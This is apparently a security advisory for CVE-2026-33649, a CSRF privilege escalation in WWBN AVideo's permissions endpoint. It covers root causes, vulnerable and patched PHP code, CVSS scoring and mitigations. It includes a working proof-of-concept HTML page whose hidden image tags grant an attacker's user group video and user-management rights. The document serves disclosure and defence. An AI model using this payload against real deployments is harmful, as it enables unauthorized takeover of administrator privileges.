CVE-2026-33649: GET-Based CSRF Privilege Escalation in WWBN AVideo

WWBN AVideo up to version 26.0 contains a Cross-Site Request Forgery (CSRF) vulnerability tracked as CVE-2026-33649. The flaw resides within the plugin/Permissions/setPermission.json.php endpoint, which is responsible for modifying user group access controls. By exploiting this vulnerability, an attacker can perform unauthorized state-changing operations on the application.

The vulnerable endpoint processes incoming requests to grant or revoke critical system privileges, such as video upload capabilities and user management rights. Because it fails to properly validate the origin and intent of these requests, it exposes a critical attack surface. Administrators managing the platform are the primary targets, as their elevated session privileges are required to execute the permission changes.

The attack vector relies on an attacker crafting a malicious web page that automatically triggers requests to the vulnerable AVideo endpoint. When an authenticated administrator visits this page, their browser executes the requests within the context of their active session. The application blindly trusts these requests, resulting in unauthorized privilege escalation for an attacker-controlled user group.

The root cause of CVE-2026-33649 is a combination of three distinct security misconfigurations interacting within the application architecture. First, the setPermission.json.php endpoint explicitly retrieves parameters using the $_REQUEST superglobal array. This implementation allows the endpoint to accept input via HTTP GET query strings, violating the standard practice of using POST requests for state-changing operations.

Second, the endpoint completely omits anti-CSRF token validation. While the AVideo application implements a global token validation function named isGlobalTokenValid(), developers failed to invoke this function within the permissions endpoint. Other administrative endpoints, such as saveSort.json.php, correctly implement this check, indicating a localized oversight rather than a systemic lack of CSRF protection mechanisms.

Third, the vulnerability is amplified by AVideo's session cookie configuration. The application explicitly sets ini_set('session.cookie_samesite', 'None'); in objects/include_config.php. This configuration is documented as an intentional choice to support cross-origin iframe embedding for video players. However, setting SameSite=None removes modern browser protections against cross-site request inclusion, allowing session cookies to be appended to GET requests initiated from arbitrary third-party domains.

An examination of the vulnerable code in plugin/Permissions/setPermission.json.php reveals the exact mechanism of the flaw. The script iterates over an array of expected parameters, extracting them directly from $_REQUEST without validating the HTTP method. It then passes these unvalidated, untrusted inputs directly to the Permissions::setPermission() method.

$intvalList = array('users_groups_id','plugins_id','type','isEnabled');
foreach ($intvalList as $value) {
    if($_REQUEST[$value]==='true'){
        $_REQUEST[$value] = 1;
    }else{
        $_REQUEST[$value] = intval($_REQUEST[$value]);
    }
}
 
$obj = new stdClass();
$obj->id = Permissions::setPermission($_REQUEST['users_groups_id'], $_REQUEST['plugins_id'], $_REQUEST['type'], $_REQUEST['isEnabled']);

To remediate this vulnerability, the endpoint must be refactored to enforce strict HTTP method validation and token verification. The application must reject any request that does not use the POST method. Furthermore, it must call the existing isGlobalTokenValid() function before processing any input variables.

// 1. Enforce POST method
if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    die(json_encode(array('error' => 'POST method required')));
}
// 2. Enforce CSRF token
if (!isGlobalTokenValid()) {
    die(json_encode(array('error' => 'Invalid CSRF token')));
}
 
$intvalList = array('users_groups_id','plugins_id','type','isEnabled');
foreach ($intvalList as $value) {
    if($_POST[$value]==='true'){
        $_POST[$value] = 1;
    }else{
        $_POST[$value] = intval($_POST[$value]);
    }
}
 
$obj = new stdClass();
$obj->id = Permissions::setPermission($_POST['users_groups_id'], $_POST['plugins_id'], $_POST['type'], $_POST['isEnabled']);

Exploitation of CVE-2026-33649 requires the attacker to fulfill specific prerequisites. The target administrator must have an active, authenticated session with the AVideo application. The attacker must also identify the numeric ID of a user group they control (e.g., ID 2), which will be the recipient of the escalated privileges.

The attack methodology involves crafting a malicious HTML payload designed to silently execute HTTP GET requests. The provided proof-of-concept utilizes hidden <img> tags, appending the necessary parameters to the target endpoint's URL. By assigning multiple tags to the page, the attacker can systematically grant a series of permissions in a single page load.

<!DOCTYPE html>
<html>
<head><title>Interesting Content</title></head>
<body>
<h1>Check out this video!</h1>
<!-- PERMISSION_FULLACCESSVIDEOS (type=10) -->
<img src='https://target.example.com/plugin/Permissions/setPermission.json.php?users_groups_id=2&plugins_id=1&type=10&isEnabled=true' style='display:none'>
<!-- PERMISSION_USERS (type=20) -->
<img src='https://target.example.com/plugin/Permissions/setPermission.json.php?users_groups_id=2&plugins_id=1&type=20&isEnabled=true' style='display:none'>
</body>
</html>

When the administrator renders this HTML page, the browser attempts to resolve the image sources. It automatically fires asynchronous GET requests to the AVideo server. Because the server configures session cookies with SameSite=None, the browser includes the administrator's authentication cookies in the cross-origin requests, resulting in successful privilege escalation.

The successful exploitation of CVE-2026-33649 results in significant security consequences for the affected AVideo deployment. An unauthenticated attacker leverages the administrator's session to elevate the privileges of their own user group. This drive-by compromise grants the attacker unauthorized access to administrative functions without requiring direct authentication credentials.

The specific permissions demonstrated in the proof-of-concept grant the attacker extensive control. By assigning PERMISSION_FULLACCESSVIDEOS and PERMISSION_USERS, the attacker gains the ability to manipulate platform content and manage other users. This lateral movement compromises both the confidentiality and integrity of the system data.

The vulnerability is assessed with a CVSS v3.1 base score of 8.1 (High), reflecting the critical nature of the flaw. The vector string (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N) highlights that while user interaction is required (UI:R), the attack is network-exploitable (AV:N), has low complexity (AC:L), and requires no prior privileges (PR:N) from the attacker's origin context.

As of the publication date, no official patched release is available for WWBN AVideo to address CVE-2026-33649. Administrators operating affected systems must implement immediate manual remediations or compensating controls to secure their deployments. The primary recommendation is to manually patch the vulnerable PHP script as outlined in the code analysis section.

Administrators must modify plugin/Permissions/setPermission.json.php to explicitly enforce the POST HTTP method and require valid anti-CSRF tokens via the isGlobalTokenValid() function. All references to the $_REQUEST superglobal within this file must be replaced with $_POST to ensure parameters are not accepted via URL query strings.

In environments where direct code modification is not immediately feasible, compensating controls must be deployed. Security teams should implement Web Application Firewall (WAF) rules to explicitly block all GET requests targeting the /plugin/Permissions/setPermission.json.php URI path. Furthermore, administrators must practice strict session hygiene by avoiding general web browsing while maintaining an active session in the AVideo management console.